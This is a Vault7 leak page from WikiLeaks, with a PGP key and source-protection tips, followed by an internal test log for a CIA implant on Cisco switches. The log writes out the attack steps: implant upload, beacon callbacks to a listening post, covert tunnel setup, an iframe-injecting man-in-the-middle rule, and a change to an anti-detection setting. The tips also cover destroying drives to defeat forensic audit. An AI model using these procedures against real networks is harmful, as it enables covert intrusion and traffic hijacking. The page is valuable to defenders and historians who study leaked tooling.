This key's fingerprint is A04C 5E09 ED02 B328 03EB 6116 93ED 732E 9231 8DBA

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQQNBFUoCGgBIADFLp+QonWyK8L6SPsNrnhwgfCxCk6OUHRIHReAsgAUXegpfg0b
rsoHbeI5W9s5to/MUGwULHj59M6AvT+DS5rmrThgrND8Dt0dO+XW88bmTXHsFg9K
jgf1wUpTLq73iWnSBo1m1Z14BmvkROG6M7+vQneCXBFOyFZxWdUSQ15vdzjr4yPR
oMZjxCIFxe+QL+pNpkXd/St2b6UxiKB9HT9CXaezXrjbRgIzCeV6a5TFfcnhncpO
ve59rGK3/az7cmjd6cOFo1Iw0J63TGBxDmDTZ0H3ecQvwDnzQSbgepiqbx4VoNmH
OxpInVNv3AAluIJqN7RbPeWrkohh3EQ1j+lnYGMhBktX0gAyyYSrkAEKmaP6Kk4j
/ZNkniw5iqMBY+v/yKW4LCmtLfe32kYs5OdreUpSv5zWvgL9sZ+4962YNKtnaBK3
1hztlJ+xwhqalOCeUYgc0Clbkw+sgqFVnmw5lP4/fQNGxqCO7Tdy6pswmBZlOkmH
XXfti6hasVCjT1MhemI7KwOmz/KzZqRlzgg5ibCzftt2GBcV3a1+i357YB5/3wXE
j0vkd+SzFioqdq5Ppr+//IK3WX0jzWS3N5Lxw31q8fqfWZyKJPFbAvHlJ5ez7wKA
1iS9krDfnysv0BUHf8elizydmsrPWN944Flw1tOFjW46j4uAxSbRBp284wiFmV8N
TeQjBI8Ku8NtRDleriV3djATCg2SSNsDhNxSlOnPTM5U1bmh+Ehk8eHE3hgn9lRp
2kkpwafD9pXaqNWJMpD4Amk60L3N+yUrbFWERwncrk3DpGmdzge/tl/UBldPoOeK
p3shjXMdpSIqlwlB47Xdml3Cd8HkUz8r05xqJ4DutzT00ouP49W4jqjWU9bTuM48
LRhrOpjvp5uPu0aIyt4BZgpce5QGLwXONTRX+bsTyEFEN3EO6XLeLFJb2jhddj7O
DmluDPN9aj639E4vjGZ90Vpz4HpN7JULSzsnk+ZkEf2XnliRody3SwqyREjrEBui
9ktbd0hAeahKuwia0zHyo5+1BjXt3UHiM5fQN93GB0hkXaKUarZ99d7XciTzFtye
/MWToGTYJq9bM/qWAGO1RmYgNr+gSF/fQBzHeSbRN5tbJKz6oG4NuGCRJGB2aeXW
TIp/VdouS5I9jFLapzaQUvtdmpaeslIos7gY6TZxWO06Q7AaINgr+SBUvvrff/Nl
l2PRPYYye35MDs0b+mI5IXpjUuBC+s59gI6YlPqOHXkKFNbI3VxuYB0VJJIrGqIu
Fv2CXwy5HvR3eIOZ2jLAfsHmTEJhriPJ1sUG0qlfNOQGMIGw9jSiy/iQde1u3ZoF
so7sXlmBLck9zRMEWRJoI/mgCDEpWqLX7hTTABEBAAG0x1dpa2lMZWFrcyBFZGl0
b3JpYWwgT2ZmaWNlIEhpZ2ggU2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBLZXkgKFlv
dSBjYW4gY29udGFjdCBXaWtpTGVha3MgYXQgaHR0cDovL3dsY2hhdGMzcGp3cGxp
NXIub25pb24gYW5kIGh0dHBzOi8vd2lraWxlYWtzLm9yZy90YWxrKSA8Y29udGFj
dC11cy11c2luZy1vdXItY2hhdC1zeXN0ZW1Ad2lraWxlYWtzLm9yZz6JBD0EEwEK
ACcCGwMFCwkIBwMFFQoJCAsFFgIDAQACHgECF4AFAlb6cdIFCQOznOoACgkQk+1z
LpIxjbrlqh/7B2yBrryWhQMGFj+xr9TIj32vgUIMohq94XYqAjOnYdEGhb5u5B5p
BNowcqdFB1SOEvX7MhxGAqYocMT7zz2AkG3kpf9f7gOAG7qA1sRiB+R7mZtUr9Kv
fQSsRFPb6RNzqqB9I9wPNGhBh1YWusUPluLINwbjTMnHXeL96HgdLT+fIBa8ROmn
0fjJVoWYHG8QtsKiZ+lo2m/J4HyuJanAYPgL6isSu/1bBSwhEIehlQIfXZuS3j35
12SsO1Zj2BBdgUIrADdMAMLneTs7oc1/PwxWYQ4OTdkay2deg1g/N6YqM2N7rn1W
7A6tmuH7dfMlhcqw8bf5veyag3RpKHGcm7utDB6k/bMBDMnKazUnM2VQoi1mutHj
kTCWn/vF1RVz3XbcPH94gbKxcuBi8cjXmSWNZxEBsbirj/CNmsM32Ikm+WIhBvi3
1mWvcArC3JSUon8RRXype4ESpwEQZd6zsrbhgH4UqF56pcFT2ubnqKu4wtgOECsw
K0dHyNEiOM1lL919wWDXH9tuQXWTzGsUznktw0cJbBVY1dGxVtGZJDPqEGatvmiR
o+UmLKWyxTScBm5o3zRm3iyU10d4gka0dxsSQMl1BRD3G6b+NvnBEsV/+KCjxqLU
vhDNup1AsJ1OhyqPydj5uyiWZCxlXWQPk4p5WWrGZdBDduxiZ2FTj17hu8S4a5A4
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
J3x7gtxUMkTadELqwY6hrU8=
=BLTH
-----END PGP PUBLIC KEY BLOCK-----
		

Contact

If you need help using Tor you can contact WikiLeaks for assistance in setting it up using our simple webchat available at: https://wikileaks.org/talk

If you can use Tor, but need to contact WikiLeaks for other reasons use our secured webchat available at http://wlchatc3pjwpli5r.onion

We recommend contacting us over Tor if you can.

Tor

Tor is an encrypted anonymising network that makes it harder to intercept internet communications, or see where communications are coming from or going to.

In order to use the WikiLeaks public submission system as detailed above you can download the Tor Browser Bundle, which is a Firefox-like browser available for Windows, Mac OS X and GNU/Linux and pre-configured to connect using the anonymising system Tor.

Tails

If you are at high risk and you have the capacity to do so, you can also access the submission system through a secure operating system called Tails. Tails is an operating system launched from a USB stick or a DVD that aim to leaves no traces when the computer is shut down after use and automatically routes your internet traffic through Tor. Tails will require you to have either a USB stick or a DVD at least 4GB big and a laptop or desktop computer.

Tips

Our submission system works hard to preserve your anonymity, but we recommend you also take some of your own precautions. Please review these basic guidelines.

1. Contact us if you have specific problems

If you have a very large submission, or a submission with a complex format, or are a high-risk source, please contact us. In our experience it is always possible to find a custom solution for even the most seemingly difficult situations.

2. What computer to use

If the computer you are uploading from could subsequently be audited in an investigation, consider using a computer that is not easily tied to you. Technical users can also use Tails to help ensure you do not leave any records of your submission on the computer.

3. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

After

1. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

2. Act normal

If you are a high-risk source, avoid saying anything or doing anything after submitting which might promote suspicion. In particular, you should try to stick to your normal routine and behaviour.

3. Remove traces of your submission

If you are a high-risk source and the computer you prepared your submission on, or uploaded it from, could subsequently be audited in an investigation, we recommend that you format and dispose of the computer hard drive and any other storage media you used.

In particular, hard drives retain data after formatting which may be visible to a digital forensics team and flash media (USB sticks, memory cards and SSD drives) retain data even after a secure erasure. If you used flash media to store sensitive data, it is important to destroy the media.

If you do this and are a high-risk source you should make sure there are no traces of the clean-up, since such traces themselves may draw suspicion.

4. If you face legal action

If a legal action is brought against you as a result of your submission, there are organisations that may help you. The Courage Foundation is an international organisation dedicated to the protection of journalistic sources. You can find more details at https://www.couragefound.org.

WikiLeaks publishes documents of political or historical importance that are censored or otherwise suppressed. We specialise in strategic global publishing and large archives.

The following is the address of our secure site where you can anonymously upload your documents to WikiLeaks editors. You can only access this submissions system through Tor. (See our Tor tab for more information.) We also advise you to read our tips for sources before submitting.

wlupld3ptjvsgwqw.onion
Copy this address into your Tor browser. Advanced users, if they wish, can also add a further layer of encryption to their submission using our public PGP key.

If you cannot use Tor, or your submission is very large, or you have specific requirements, WikiLeaks provides several alternative methods. Contact us to discuss how to proceed.

Vault7: CIA Hacking Tools Revealed

Navigation: » Latest version


Owner: User #71467

Aquaman-5h-Without-Snooping Test Notes

Xetron redelivered Aquaman-5h without snooping as an interim solution to EAREnterprise Archive 5244.  Plan is to run through all tests from previous Aquaman-5h testing, as well as verify that the bug from EAREnterprise Archive 5244 is not reproducible.

Testing Summary

  • 2960S crashes and reloads if show stacks issued during a reinstall of hg (after initial install with leave_behind and uninstall)
  • Confirmed snoop not enabled and EAREnterprise Archive 5244 no longer observed
  • Identified 2 things in show tech that need to be checked
  • Need to compare some crashinfo and write core files
  • See last entry for current status and next tests

 

Progress / Notes

  1. Run through HG Base Smoke Tests
  2. Install/Uninstall without leave-behind
    1. Establish baseline values for clean target device - skipped because we already have that data from previous testing
    2. IAC attack - successful, received codes were 125, 60, 159 which are in the readme
      1. Edited target-aliases to use target address 172.31.255.14
      2. Edited target-aliases to use correct proc_id
    3. HG upload - hg_start, left 1s delay between packets
    4. HG uploaded successfully - result good
    5. Establish CTCounter Terrorism Session with HG according to readme
      1. Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
      2. Ran ./prep-ct.sh
      3. Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
      4. Trigger implant - beacon call_base_back https  172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
        1. 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
      5. Successful HG comms
    6. Uninstall according to readme
      1. device uninstall_hg -mp -f - Successful
      2. Memory back down, no syslog messages, no crash
  3. Install/Uninstall with leave-behind
    1. Reloaded switch to start with a clean switch
    2. SSHIAC attack - successful, received codes were in readme
    3. HG upload - hg_start_leave_behiind  - delay of 1s delay between packets - Successful
    4. Collected a show tech
    5. Establish CTCounter Terrorism Session with HG according to readme
      1. Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
      2. Trigger implant - beacon call_base_back https  172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
        1. 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
      3. Successful HG comms
    6. Uninstall according to readme - successful, no anamolies seen
    7. Did broad on remote - ok
    8. hg_start to reinstall
      1. While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:

        Instruction Access Exception (0x0400)!

      2. Not sure if this was related to entering show stacks whlie hg reinstall taking place or if that was a coincidence

    9. Attempt to reproduce the crash
      1. SSHIAC attack
      2. Changed interpacket time to 0.1s
      3. hg_start_leave_behind - successful
      4. Establish CTCounter Terrorism Session
      5. Uninstall according to readme - successful, no anamolies seen
      6. hg_start to reinstall
        1. No show commands entered - successful reinstall
      7. Establish CTCounter Terrorism Session
      8. Uninstall hg - successful
      9. SSHIAC attack
      10. hg_start_leave_behind to reintsall
        1. this time, enter show stacks during install
        2. no crashes - output of show stacks does show the artifacts, this is a known issue
      11. Could not establish comms - reloading switch and going to try to repeat again
      12. Reloaded switch
      13. SSHIAC attack
      14. hg_start_leave_behind
      15. Establish CTCounter Terrorism session
      16. device hg_uninstall -mp -f
      17. hg_start_leave_behind - i entered show stacks during install and it crashed again
  4. Command and Control
    1. Establish CTCounter Terrorism session and verify versions/capabilities
      1. Reload switch to start with clean target
      2. SSHIAC attack
      3. hg_start
      4. Established CTCounter Terrorism session
      5. ilm show - ilm version 3.8.0
      6. device get_uid - 1ce85d68a280
      7. beacon show - beacon not enabled for this op
      8. capability show -v 
        1. baseline version 3.3.0
        2. lists all modules
    2. Basic command and control
      1. module show - modules running
      2. module stop Trigger - success
      3. module start Trigger.mod - success
      4. ilm refresh - success
      5. module show - success - Trigger module running
    3. Hit tab key to verify output of available commands
      1. mitm present, collect present
      2. dns show, web show, https show - startup delay set to 32850k days - no snoop
      3. dns get_snooped_host_list_client 0 100 - no snooped hosts even though seeds running
    4. Boundary Test
      1. Run through list in HG Base Smoke Test Procedure - all failed gracefully, did not attempt to start snoop
  5. CI Profile
    1. Collect output for comparison - collected output in new files, will compare to previous test output
      1. 29.66712 MB more Used memory with HG installed
      2. Observed same spikes in CPU during SSHIAC attack, HG upload and SSLSecure Socket Layer handshake as observed in previous testing
      3. No change to file system
      4. Show tech - observed known show stacks and show controllers artifacts
      5. Show tech after hg uninstall - output of show tech platform tcam util asic all has a higher number for one value - IPv4 security aces went from 36 to 284 for ASIC 0 and ASIC 1 - need to test this further
      6. Show tech with hg - no output for remote command all show vtp status, whereas there is output for without hg and after hg uninstall.  need to test this further.
    2. Added to Rancid and ran once with HG, then uninstalled hg, reloaded switch, and ran rancid again to compare
    3. RANCID rev 1.3 with HG, rev 1.5 without - no differences
  6. SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure
    1. Start with a clean, reloaded 2960-S
    2. SSHIAC attack and HG install
    3. Established CTCounter Terrorism session
    4. Completed module control test - stop, start - did not complete module delete and reload test
    5. Did not test module persistence
    6. Created SMITE rule
    7. Iframe is injected into web page, viewed in source URL
    8. Able to attach in Windex and view secrets.txt
    9. Deleted mitm rule - iframe no longer injected
  7. Samsonite Test Case - Uninstall HG and re-attack
    1. Reloaded 2960-S to start with a clean target device
    2. Attacked with SSHIAC, installed HG and established comms
    3. Attempted uninstall hg command device uninstall_hg -mp -f - then typed yes to confirm, result success.
    4. Checked used memory on the target 2960-S and the memory has gone back to down normal level without HG installed (may be slight difference, need to do the math), no syslog messages, no CPU spike
    5. Re-attacked using SSHIAC, installed HG, established HG comms - no anomalies
    6. Uninstalled HG again using device uninstall_hg -mp -f - no anomalies
      1. No syslogs
      2. Used memory back to normal
  8. Samsonite Test Case - Dropped connection during HG install
    1. Reloaded 2960-S to start with a clean target device
    2. Attacked with SSHIAC
    3. Entered hg_start and after just a few chunks were sent, shut int g1/0/11 via console connection on 2960-S to simulate network outage
    4. ICON-CT reported HG install failed
    5. No syslog messages from switch
    6. Used memory still shows higher than it should, but not as high as if HG were installed - 27657488 (b)
    7. Issued no shut on 2960-S interface g1/0/11 to re-enable the connection
    8. Entered hg_start on ICON-CT and HG successfully uploaded - used memory after successful install - 30524888 (b)
  9. Re-test EAREnterprise Archive 5244
    1. With HG installed, but no CTCounter Terrorism session, enter service network restart on Seeds host 10x
    2. Did not see err-disable condition
    3. Established CTCounter Terrorism session and enter service network restart on Seeds host 10x
    4. Did not see err-disable condition
  10. Samsonite Test Case - Attempt to install HG when HG already installed
    1. Cannot initiate hg_start again via remote - reports comms failure
    2. Attempted to re-attack with SSHIAC - seemed to go through normal SSHIAC install process, however at the end of the install, could not establish comms with remote
      1. Broad didn't work
      2. hg_start fails
    3. CT session with HG active throughout
  11. Samsonite Test Case - Enable MITMMan-In-The-Middle attack rule and execute system administrator commands
    1. Enabled the SMITE MITMMan-In-The-Middle attack rule in HG
    2. Performed the following with no anomalies observed
      1. Cleared log buffer
      2. Disable/re-enable logging
      3. Multiple show commands - show vlan, mac-address table, memory, proc cpu, proc cpu hist, log,run
      4. Write mem
      5. Add/delete a user
      6. Add/delete a VLAN
    3. Verified that SMITE works by web browsing from Victim VMVirtual Machine - collected output from Wireshark running on Victim VMVirtual Machine which shows Iframe
  12. Samsonite Test Case - Issue Cisco "test crash" command to test crash and generate a crashinfo
    1. With HG installed, issued test crash and selected reason as software forced crash
      1. Saved output of crashinfo file
      2. Saved log messages seen upon reboot of switch in log buffer
      3. Memory used had returned to normal levels for no HG
    2. Without HG installed, repeated test crash - need to compare crashinfo
      1. Issued "test crash" command with software forced crash as reason
      2. Saved output of crashinfo file
      3. Saved syslog messages seen up reboot of switch in log buffer - Need to compare these crashinfo and log messages
  13.  Samsonite Test Case - Perform core dump of 2960-S
    1. Performed a write core and saved to TFTPFile transfer software server - both before and after HG install with comess
    2. Also collected a write core from after hg uninstall
    3. Need to compare these files
  14. Going home - reloaded 2960-S switch right before i left, so it does not have HG.  Tomorrow, need to pick up with Test 32 from original Aquaman Test Notes page - testing smite through dualor tunnel.  HG is still installed on 2960#1, and I made a CTCounter Terrorism session with that one in the bottom left-hand workspace on ICON-CT.  Do not reload that 2960 or remove HG or else we will have to go through the process of modifying the tunnel.ini so that it won't drop tunnel when it detects tap ip active on network.  
  15. OR, could go back complete Test number 25 - Performance tests, which I had skipped.
  16. (Test 32 from original test) Trigger and Callback through a HG Tunnel running Aquaman-3h on 2960
    1. Updated 2960#1 to 12.2(50)SE5 and implanted with Aquaman-3h delivery of HG --> Confirmed switch is running 12.2(50)SE5
    2. Established comms with Aquaman-3h from ICON-CT on port 443 --> Re-established comms with 2960#1
      1. On Listen window: ilm listen aquaman-3h.txt
      2. On Trigger window: ilm trigger aquamen-3h.txt
        1. beacon call_me_back https 443 -ii 192.168.44.39
      3. Successfull SSLSecure Socket Layer handshake
    3. Disabled setting in Aquaman-3h HG tunnel which will disable the tunnel if the tap IP becomes active
      1. Edit hg/config/tunnel.ini and change DetectTAPSrcTraffic=Yes to No
      2. From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = Yes
      3. From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg tunnel.ini and note in the output that DetectTAPSrcTraffic has been changed to No
      4. From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = No
      5. From Aquaman-3h CutThroat, type file put cfs/000000004B8FAF63.cfg default:000000004B8FAF63.cfg in order to load the new setting up to HG
      6. From Aquaman-3h CutThroat, type module restart default:CovertTunnel.mod to restart the module
        1. This did not work initially and Xetron is aware of this problem.  To fix, try restarting again, and run ilm refresh.
    4. Establish Dualor tunnel with tap IP 192.168.0.110
      1. From /hg/tools/dualor/linux, run ./Dualor ../config/dualor-endpoint.ini and note that you get a message that CTCounter Terrorism is listening on port 444
      2. From Aquaman-3h CutThroat, run tun init tools/dualor/config/dualor-callback.ini and note that the SSLSecure Socket Layer session establishes
      3. Note that on ICON-CT VMVirtual Machine you know have a new interface called tap0 with an iP 192.168.0.110
    5. Add a route to ICON-CT for 192.168.21.0/24 to use tap0 interface - route add -net 192.168.21.0/24 dev tap0
    6. Move to Aquaman-5h setup - Edit aquaman-5h.txt Interface value under general settings to tap0, and set CommsH port to 445
    7. Establish HG comms using "beacon call_base_back https 192.168.0.110 445 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4"
    8. Comms successfully established through Aquaman-3h tunnel
    9. Configured mitm rule for SMITE as in tests above and successfully exploited Victim VMVirtual Machine and read secrets.txt from Windex
    10. Viewed web page source code which showed the iframe with promo code.
    11. Deleted MITMMan-In-The-Middle attack rule. Issued "mitm show" to confirm rule is deleted
    12. Moved to Aquaman-3h screens. In Listen window, issued "tun show" to get tunnel ID. Then issued "tun close 7" with success. "tun show" command confirms no active tunnels. Issued "ifconfig" in a terminal to confirm "tap 0" interface is gone.
    13. Edited ..aquaman-5h/hg/aquaman-5h.txt file to change interface back to "eth0" and port back to "443"

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh